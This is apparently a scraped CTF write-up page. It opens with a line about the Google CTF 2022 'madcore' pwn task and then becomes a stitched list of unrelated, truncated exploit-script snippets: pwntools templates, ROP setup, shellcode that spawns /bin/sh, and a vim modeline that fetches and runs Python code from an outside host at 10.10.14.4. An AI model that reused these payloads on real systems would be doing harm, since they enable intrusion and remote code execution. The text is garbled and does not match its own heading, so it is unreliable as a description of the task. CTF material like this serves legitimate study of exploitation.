madcore was a pwn task from [Google CTF 2022][googlectf]. It is a coredump helper
that parses its input as a coredump file and produces some results.
We are provided with a few files:
Dockerfile
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # This exploit template was generated via: | |
| # $ pwn template ezvm | |
| from pwn import * | |
| HOST, PORT = "47.252.3.1 40241".split() | |
| # Set up pwntools for the correct architecture | |
| exe = context.binary = ELF('ezvm') |
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # This exploit template was generated via: | |
| # $ template template | |
| import re | |
| import time | |
| from pwn import * | |
| from struct import pack, unpack | |
| from binascii import hexlify |
| :!python2 -c "import requests;exec(requests.get('http://10.10.14.4:8080/code.py').text);"||" vim:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" |
| import struct | |
| from pwn import ELF, p64, context | |
| from base64 import b64encode | |
| # FILE = './authkeys' | |
| # BINARY = ELF(FILE) | |
| OFFSET = 776 | |
| PUBLIC_KEY = open('./id_rsa.pub', 'rb').read()[:-1] | |
| SET_EAX = 0x00400394 |
| #include <time.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <openssl/md5.h> | |
| char* str2md5(const char *str, int length) { | |
| int n; |
| #!/usr/bin/env python3 | |
| import sys | |
| import time | |
| import socket | |
| import threading | |
| import requests | |
| from ftplib import FTP_TLS | |
| from bs4 import BeautifulSoup | |
| from termcolor import colored |
| #!/usr/bin/env python3 | |
| from pwn import ELF, process, log, p64, ROP, context, remote | |
| context.clear(arch='amd64') | |
| BIN_NAME = 'myapp' | |
| BINARY = ELF(BIN_NAME) | |
| rop = ROP(BINARY) |
| #!/usr/bin/env python3 | |
| from pwn import ssh, log, p32 | |
| LOCAL_PAYLOAD = 'payload' | |
| REMOTE_PAYLOAD = '/tmp/payload' | |
| SHELLCODE = b'\x90\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' | |
| # get the address executing | |
| # thrasivoulos@Sneaky:/usr/local/bin$ ltrace ./chal `cat /tmp/payload` |
| #!/usr/bin/env python3 | |
| import re | |
| from pwn import ELF, process, context, log, ssh, p32, u32 | |
| # name of local and remote files with payloads | |
| FILENAME = '/tmp/payload' | |
| # name of binary on the remote machine | |
| BINARY = '/home/xalvas/app/goodluck' |